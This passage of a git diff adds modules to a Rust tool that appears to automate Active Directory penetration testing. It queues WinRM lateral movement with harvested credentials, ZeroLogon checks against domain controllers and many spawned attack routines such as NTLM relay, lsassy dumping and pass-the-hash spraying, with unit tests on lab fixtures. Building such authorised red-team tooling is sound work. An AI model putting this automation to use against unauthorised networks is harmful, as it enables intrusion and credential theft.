+            id: uuid::Uuid::new_v4().to_string(),
+            username: username.to_string(),
+            password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+            domain: domain.to_string(),
+            source: String::new(),
+            discovered_at: None,
+            is_admin: false,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    #[test]
+    fn collect_empty_state_produces_no_work() {
+        let state = StateInner::new("test".into());
+        let work = collect_webdav_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[test]
+    fn collect_no_credentials_produces_no_work() {
+        let mut state = StateInner::new("test".into());
+        state.hosts.push(make_host(
+            "192.168.58.22",
+            "web01.contoso.local",
+            false,
+            vec!["80/tcp webdav".to_string()],
+        ));
+        let work = collect_webdav_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[test]
+    fn collect_host_with_webdav_and_creds_produces_work() {
+        let mut state = StateInner::new("test".into());
+        state.hosts.push(make_host(
+            "192.168.58.22",
+            "web01.contoso.local",
+            false,
+            vec!["80/tcp webdav".to_string()],
+        ));
+        state.credentials.push(make_cred("admin", "contoso.local"));
+        let work = collect_webdav_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].target_ip, "192.168.58.22");
+        assert_eq!(work[0].hostname, "web01.contoso.local");
+        assert_eq!(work[0].domain, "contoso.local");
+        assert_eq!(work[0].dedup_key, "webdav:192.168.58.22");
+        assert_eq!(work[0].vuln_id, "webdav_enabled_192_168_58_22");
+        assert_eq!(work[0].credential.username, "admin");
+    }
+
+    #[test]
+    fn collect_skips_dc_hosts() {
+        let mut state = StateInner::new("test".into());
+        state.hosts.push(make_host(
+            "192.168.58.10",
+            "dc01.contoso.local",
+            true,
+            vec!["80/tcp 
webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_host_without_webdav_services() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["445/tcp microsoft-ds".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_processed_dedup() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_WEBDAV_DETECTION, "webdav:192.168.58.22".into()); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_registered_vuln() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + state.discovered_vulnerabilities.insert( + "webdav_enabled_192_168_58_22".to_string(), + ares_core::models::VulnerabilityInfo { + vuln_id: "webdav_enabled_192_168_58_22".to_string(), + vuln_type: "webdav_enabled".to_string(), + target: "192.168.58.22".to_string(), + discovered_by: "test".to_string(), + discovered_at: chrono::Utc::now(), + details: std::collections::HashMap::new(), + recommended_agent: "coercion".to_string(), + priority: 4, + }, + ); + let work = collect_webdav_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_extracts_domain_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.30", + "web01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state + .credentials + .push(make_cred("svc_web", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["WebClient service running".to_string()], + )); + // First cred is fabrikam, second is contoso (matching host domain) + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + state + .credentials + .push(make_cred("user_con", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_con"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_cred_when_no_domain_match() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Only fabrikam creds, host is contoso + state + .credentials + .push(make_cred("user_fab", "fabrikam.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user_fab"); + } + + #[test] + fn collect_bare_hostname_falls_back_to_first_cred() { + let mut state = StateInner::new("test".into()); + 
state.hosts.push(make_host( + "192.168.58.22", + "web01", + false, + vec!["80/tcp webdav".to_string()], + )); + state + .credentials + .push(make_cred("fallback_user", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 1); + // bare hostname has empty domain, so domain match fails; falls back to first + assert_eq!(work[0].credential.username, "fallback_user"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + // Good: member server with webdav + state.hosts.push(make_host( + "192.168.58.22", + "web01.contoso.local", + false, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: DC + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + true, + vec!["80/tcp webdav".to_string()], + )); + // Skipped: no webdav service + state.hosts.push(make_host( + "192.168.58.40", + "sql01.contoso.local", + false, + vec!["1433/tcp ms-sql-s".to_string()], + )); + // Good: IIS server + state.hosts.push(make_host( + "192.168.58.50", + "ws01.fabrikam.local", + false, + vec!["80/tcp iis httpd".to_string()], + )); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_webdav_work(&state); + assert_eq!(work.len(), 2); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[1].target_ip, "192.168.58.50"); + } +} diff --git a/ares-cli/src/orchestrator/automation/winrm_lateral.rs b/ares-cli/src/orchestrator/automation/winrm_lateral.rs new file mode 100644 index 00000000..ffa42ab6 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/winrm_lateral.rs @@ -0,0 +1,537 @@ +//! auto_winrm_lateral -- attempt WinRM lateral movement with owned credentials. +//! +//! WinRM (port 5985/5986) is a common lateral movement vector in AD environments. +//! evil-winrm provides PowerShell remoting access when credentials are valid and +//! the user has remote management rights. This module dispatches WinRM access +//! attempts against hosts where we have credentials but haven't tried WinRM yet. +//! +//! WinRM complements SMB-based lateral movement (psexec/wmiexec) by working even +//! when SMB is restricted or firewall-filtered. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect WinRM lateral movement work items from current state. +/// +/// Pure logic extracted from `auto_winrm_lateral` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. 
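+///
+/// For example (mirroring the unit tests below): a host exposing
+/// `"5985/tcp http"` while credentials exist in state yields one `WinRmWork`
+/// keyed `winrm:<ip>`, preferring a credential whose domain matches the
+/// host's DNS suffix and falling back to the first credential otherwise.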
+fn collect_winrm_lateral_work(state: &StateInner) -> Vec<WinRmWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for host in &state.hosts {
+        // Check if host has WinRM indicators in services
+        let has_winrm = host.services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("5985") || sl.contains("5986") || sl.contains("winrm")
+        });
+
+        if !has_winrm {
+            continue;
+        }
+
+        // Skip hosts we already own via secretsdump
+        if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) {
+            continue;
+        }
+
+        let dedup_key = format!("winrm:{}", host.ip);
+        if state.is_processed(DEDUP_WINRM_LATERAL, &dedup_key) {
+            continue;
+        }
+
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+            .or_else(|| state.credentials.first())
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(WinRmWork {
+            dedup_key,
+            target_ip: host.ip.clone(),
+            hostname: host.hostname.clone(),
+            domain,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Attempts WinRM lateral movement against hosts with owned credentials.
+/// Interval: 45s.
+pub async fn auto_winrm_lateral(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("winrm_lateral") {
+            continue;
+        }
+
+        let work: Vec<WinRmWork> = {
+            let state = dispatcher.state.read().await;
+            collect_winrm_lateral_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "winrm_exec",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("winrm_lateral");
+            match dispatcher
+                .throttled_submit("lateral", "lateral", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        target = %item.target_ip,
+                        hostname = %item.hostname,
+                        "WinRM lateral movement dispatched"
+                    );
+
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_WINRM_LATERAL, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_WINRM_LATERAL, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(target = %item.target_ip, "WinRM lateral deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, target = %item.target_ip, "Failed to dispatch WinRM lateral");
+                }
+            }
+        }
+    }
+}
+
+struct WinRmWork {
+    dedup_key: String,
+    target_ip: String,
+    hostname: String,
+    domain: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::StateInner;
+    use ares_core::models::{Credential, Host};
+
+    fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+        Credential {
+            id: format!("c-{username}"),
+            username: username.into(),
+            password: password.into(), // pragma: allowlist secret
+            domain: domain.into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn make_host(ip: &str, hostname: 
&str, services: Vec<String>) -> Host {
+        Host {
+            ip: ip.into(),
+            hostname: hostname.into(),
+            os: String::new(),
+            roles: Vec::new(),
+            services,
+            is_dc: false,
+            owned: false,
+        }
+    }
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("winrm:{}", "192.168.58.22");
+        assert_eq!(key, "winrm:192.168.58.22");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_WINRM_LATERAL, "winrm_lateral");
+    }
+
+    #[test]
+    fn winrm_service_detection() {
+        let services = [
+            "5985/tcp microsoft-httpapi".to_string(),
+            "445/tcp microsoft-ds".to_string(),
+        ];
+        let has_winrm = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("5985") || sl.contains("5986") || sl.contains("winrm")
+        });
+        assert!(has_winrm);
+    }
+
+    #[test]
+    fn winrm_https_service_detection() {
+        let services = ["5986/tcp ssl/http".to_string()];
+        let has_winrm = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("5985") || sl.contains("5986") || sl.contains("winrm")
+        });
+        assert!(has_winrm);
+    }
+
+    #[test]
+    fn no_winrm_service() {
+        let services = [
+            "445/tcp microsoft-ds".to_string(),
+            "3389/tcp ms-wbt-server".to_string(),
+        ];
+        let has_winrm = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("5985") || sl.contains("5986") || sl.contains("winrm")
+        });
+        assert!(!has_winrm);
+    }
+
+    #[test]
+    fn domain_from_hostname() {
+        let hostname = "srv01.contoso.local";
+        let domain = hostname
+            .find('.')
+            .map(|i| hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+        assert_eq!(domain, "contoso.local");
+    }
+
+    #[test]
+    fn domain_from_bare_hostname() {
+        let hostname = "srv01";
+        let domain = hostname
+            .find('.')
+            .map(|i| hostname[i + 1..].to_lowercase())
+            .unwrap_or_default();
+        assert_eq!(domain, "");
+    }
+
+    #[test]
+    fn payload_structure_validation() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let payload = serde_json::json!({
+            "technique": "winrm_exec",
+            "target_ip": "192.168.58.30",
+            "hostname": "srv01.contoso.local",
+            "domain": "contoso.local",
+            "credential": {
+                "username": cred.username,
+                "password": cred.password,
+                "domain": cred.domain,
+            },
+        });
+
+        assert_eq!(payload["technique"], "winrm_exec");
+        assert_eq!(payload["target_ip"], "192.168.58.30");
+        assert_eq!(payload["hostname"], "srv01.contoso.local");
+        assert_eq!(payload["domain"], "contoso.local");
+        assert_eq!(payload["credential"]["username"], "admin");
+        assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+        assert_eq!(payload["credential"]["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn work_struct_construction() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "testuser".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+
+        let work = WinRmWork {
+            dedup_key: "winrm:192.168.58.30".into(),
+            target_ip: "192.168.58.30".into(),
+            hostname: "srv01.contoso.local".into(),
+            domain: "contoso.local".into(),
+            credential: cred,
+        };
+
+        assert_eq!(work.dedup_key, "winrm:192.168.58.30");
+        assert_eq!(work.target_ip, "192.168.58.30");
+        assert_eq!(work.hostname, "srv01.contoso.local");
+        assert_eq!(work.domain, 
"contoso.local"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn winrm_service_detection_variations() { + let test_cases = vec![ + (vec!["5985/tcp http".to_string()], true), + (vec!["5986/tcp ssl/http".to_string()], true), + (vec!["winrm-service".to_string()], true), + (vec!["WinRM".to_string()], true), + (vec!["445/tcp smb".to_string()], false), + (vec!["3389/tcp rdp".to_string()], false), + ]; + + for (services, expected) in test_cases { + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert_eq!( + has_winrm, expected, + "Services {:?} should have winrm={expected}", + services + ); + } + } + + #[test] + fn domain_from_fabrikam_host() { + let hostname = "web01.fabrikam.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn empty_services() { + let services: Vec = vec![]; + let has_winrm = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("5985") || sl.contains("5986") || sl.contains("winrm") + }); + assert!(!has_winrm, "Empty services should not detect WinRM"); + } + + // --- collect_winrm_lateral_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_winrm_hosts_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["445/tcp smb".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_winrm_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dedup_key, "winrm:192.168.58.30"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", 
"P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.mark_processed(DEDUP_WINRM_LATERAL, "winrm:192.168.58.30".into()); + let work = collect_winrm_lateral_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_multiple_hosts_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + state.hosts.push(make_host( + "192.168.58.31", + "web01.contoso.local", + vec!["5986/tcp ssl/http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.30")); + assert!(ips.contains(&"192.168.58.31")); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_bare_hostname() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01", + vec!["5985/tcp http".into()], + )); + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + // Bare hostname -> empty domain -> falls back to first cred + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.hosts.push(make_host( + "192.168.58.30", + "srv01.contoso.local", + vec!["5985/tcp http".into()], + )); + } + let state = shared.read().await; + let work = collect_winrm_lateral_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.30"); + } +} diff --git a/ares-cli/src/orchestrator/automation/zerologon.rs b/ares-cli/src/orchestrator/automation/zerologon.rs new file mode 100644 index 00000000..128dd633 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/zerologon.rs @@ -0,0 +1,269 @@ +//! auto_zerologon -- check domain controllers for CVE-2020-1472 (ZeroLogon). +//! +//! ZeroLogon allows unauthenticated privilege escalation by exploiting a flaw +//! in the Netlogon protocol. Even on patched systems, the check is fast and +//! non-destructive. Dispatches `zerologon_check` (recon only, no exploit) +//! against each discovered DC once. +//! +//! If the check reports the DC is vulnerable, result processing will register +//! 
a "zerologon" vulnerability that other modules can act on. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +fn collect_zerologon_work(state: &StateInner) -> Vec { + state + .domain_controllers + .iter() + .filter(|(_, dc_ip)| !state.is_processed(DEDUP_ZEROLOGON, dc_ip)) + .map(|(domain, dc_ip)| { + // Derive the DC hostname (NetBIOS name) from hosts or domain + let hostname = state + .hosts + .iter() + .find(|h| h.ip == *dc_ip) + .map(|h| h.hostname.clone()) + .unwrap_or_default(); + + ZerologonWork { + domain: domain.clone(), + dc_ip: dc_ip.clone(), + hostname, + } + }) + .collect() +} + +/// Monitors for domain controllers and dispatches ZeroLogon checks. +/// Interval: 45s. +pub async fn auto_zerologon(dispatcher: Arc, mut shutdown: watch::Receiver) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("zerologon") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_zerologon_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "zerologon_check", + "target_ip": item.dc_ip, + "domain": item.domain, + "hostname": item.hostname, + }); + + let priority = dispatcher.effective_priority("zerologon"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + dc = %item.dc_ip, + domain = %item.domain, + "ZeroLogon check dispatched (CVE-2020-1472)" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ZEROLOGON, item.dc_ip.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ZEROLOGON, &item.dc_ip) + .await; + } + Ok(None) => { + debug!(dc = %item.dc_ip, "ZeroLogon check deferred by throttler"); + } + Err(e) => { + warn!(err = %e, dc = %item.dc_ip, "Failed to dispatch ZeroLogon check"); + } + } + } + } +} + +struct ZerologonWork { + domain: String, + dc_ip: String, + hostname: String, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ZEROLOGON, "zerologon"); + } + + #[test] + fn dedup_key_is_dc_ip() { + // ZeroLogon dedup is by DC IP since we check each DC once + let dc_ip = "192.168.58.10"; + assert_eq!(dc_ip, "192.168.58.10"); + } + + #[test] + fn no_cred_required() { + // ZeroLogon check doesn't require credentials + let _payload = serde_json::json!({ + "technique": "zerologon_check", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "hostname": "dc01", + }); + } + + #[test] + fn hostname_extraction_empty_fallback() { + let hosts: Vec<(String, String)> = vec![]; + let dc_ip = "192.168.58.10"; + let hostname = hosts + .iter() + .find(|(ip, _)| ip == dc_ip) + .map(|(_, h)| h.clone()) + .unwrap_or_default(); + assert_eq!(hostname, ""); + } + + #[test] + fn 
collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_dc_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[test] + fn collect_multiple_dcs_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_dc() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state.mark_processed(DEDUP_ZEROLOGON, "192.168.58.10".into()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_resolves_hostname_from_hosts() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hostname_empty_when_host_not_found() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // No matching host in state.hosts + state + .hosts + .push(make_host("192.168.58.99", "other.contoso.local", false)); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].hostname, ""); + } + + #[test] + fn collect_no_credentials_still_produces_work() { + // ZeroLogon is unauthenticated, so no credentials needed + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + assert!(state.credentials.is_empty()); + let work = collect_zerologon_work(&state); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation_spawner.rs b/ares-cli/src/orchestrator/automation_spawner.rs index 8278ea53..c8be2896 100644 --- a/ares-cli/src/orchestrator/automation_spawner.rs +++ b/ares-cli/src/orchestrator/automation_spawner.rs @@ -48,6 +48,41 @@ pub(crate) fn spawn_automation_tasks( spawn_auto!(auto_mssql_exploitation); spawn_auto!(auto_gpo_abuse); 
spawn_auto!(auto_laps_extraction);
+    spawn_auto!(auto_ntlm_relay);
+    spawn_auto!(auto_nopac);
+    spawn_auto!(auto_zerologon);
+    spawn_auto!(auto_print_nightmare);
+    spawn_auto!(auto_smb_signing_detection);
+    spawn_auto!(auto_share_coercion);
+    spawn_auto!(auto_mssql_coercion);
+    spawn_auto!(auto_password_policy);
+    spawn_auto!(auto_gpp_sysvol);
+    spawn_auto!(auto_ntlmv1_downgrade);
+    spawn_auto!(auto_ldap_signing);
+    spawn_auto!(auto_webdav_detection);
+    spawn_auto!(auto_spooler_check);
+    spawn_auto!(auto_machine_account_quota);
+    spawn_auto!(auto_dfs_coercion);
+    spawn_auto!(auto_petitpotam_unauth);
+    spawn_auto!(auto_winrm_lateral);
+    spawn_auto!(auto_group_enumeration);
+    spawn_auto!(auto_localuser_spray);
+    spawn_auto!(auto_krbrelayup);
+    spawn_auto!(auto_searchconnector_coercion);
+    spawn_auto!(auto_lsassy_dump);
+    spawn_auto!(auto_rdp_lateral);
+    spawn_auto!(auto_foreign_group_enum);
+    spawn_auto!(auto_certipy_auth);
+    spawn_auto!(auto_golden_cert);
+    spawn_auto!(auto_sid_enumeration);
+    spawn_auto!(auto_dns_enum);
+    spawn_auto!(auto_domain_user_enum);
+    spawn_auto!(auto_pth_spray);
+    spawn_auto!(auto_certifried);
+    spawn_auto!(auto_dacl_abuse);
+    spawn_auto!(auto_smbclient_enum);
+    spawn_auto!(auto_acl_discovery);
+    spawn_auto!(auto_cross_forest_enum);
 
     info!(count = handles.len(), "Automation tasks spawned");
     handles
diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs
index 7c9b5331..f673795e 100644
--- a/ares-cli/src/orchestrator/blue/investigation.rs
+++ b/ares-cli/src/orchestrator/blue/investigation.rs
@@ -551,6 +551,7 @@ mod tests {
             steps: 10,
             tool_calls_dispatched: 5,
             discoveries: Vec::new(),
+            llm_findings: Vec::new(),
             tool_outputs: Vec::new(),
         };
         match process_outcome(&outcome, "inv1") {
@@ -573,6 +574,7 @@ mod tests {
             steps: 3,
             tool_calls_dispatched: 1,
             discoveries: Vec::new(),
+            llm_findings: Vec::new(),
             tool_outputs: Vec::new(),
         };
         match process_outcome(&outcome, "inv1") {
